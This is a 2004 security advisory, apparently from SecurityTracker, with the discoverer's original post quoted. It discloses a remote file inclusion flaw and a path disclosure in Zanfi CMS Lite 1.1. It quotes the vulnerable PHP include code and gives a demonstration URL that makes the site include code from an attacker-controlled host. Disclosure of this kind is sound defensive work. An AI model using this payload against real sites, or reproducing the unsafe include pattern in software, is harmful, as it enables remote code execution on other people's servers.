Zanfi CMS Lite Include File Error Lets Remote Users Execute Arbitrary Commands
|
|
SecurityTracker Alert ID: 1011612 |
|
SecurityTracker URL: http://securitytracker.com/id/1011612
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Oct 11 2004
|
Impact:
Disclosure of system information, Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Version(s): 1.1
|
Description:
A vulnerability was reported in Zanfi CMS Lite. A remote user can execute arbitrary PHP code, including operating system commands, on the target system.
Cracklove reported that a remote user can supply a remote location for the 'inc' variable to cause arbitrary PHP code at the remote location to be included and executed by the target system. The PHP code, including operating system commands, will be executed with the privileges of the target web service.
A demonstration exploit URL is provided:
http://[target]/index.php?inc=http://[attacker]
It is also reported that a remote user can request any of several scripts to cause the system to generate an error message that discloses the installation path. A demonstration exploit URL is provided:
http://[target]/cms/adm_pages.php
Other scripts are affected, including 'corr_pages.php', 'del_block.php', 'del_page.php', 'footer.php', and 'home.php'.
The vendor has been notified without response.
The original advisory is available at:
http://www.proxysky.com/vulz/show.php?id=3
|
Impact:
A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
A remote user can determine the installation path.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: www.zanfi.nl/cms/index.php (Links to External Site)
|
Cause:
Access control error, Exception handling error, Input validation error, State error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Subject: Multiple vulnerabilities in ZanfiCmsLite
|
**********************************
*AuThor:Cracklove *
*emA!l:Cracklove[at]Gmail[dot]Com*
*HoMePaGe:http://ProxySky.com *
**********************************
[Info]
Website: http://www.zanfi.nl
Version: 1.1,The Newest Version
Problem: Full path disclosure,Include file
[Vuls]
1.Full path disclosure:
Let's try to request like this:
http://localhost/cms/adm_pages.php
and we get standard error messages like that:
Warning: mysql_query(): supplied argument is not a valid MySQL-Link resource in c:\appserv\www\cms\adm_pages.php on line 2
No blocks in the table
The Problem also in corr_pages.php,del_block.php,del_page.php,footer.php,home.php etc.
2.Include file
Ok let's open ./index.php,We see
if (!isset($inc)):
include ("home.php");
else:
include ($inc.".php");
endif;
O Yeah!See u Again Include Vul!
[Exploit]
http://target/index.php?inc=http://[Attacker]
[Fix]
Vuls has been reported to autuor,No reply yet.
[Greetings]
Greets To Lcx,Fatb,Envymask,S4T,ITS,CHT,WDYL,~The WhackerZ~ TeAm.
http://www.proxysky.com/vulz/show.php?id=3
|
|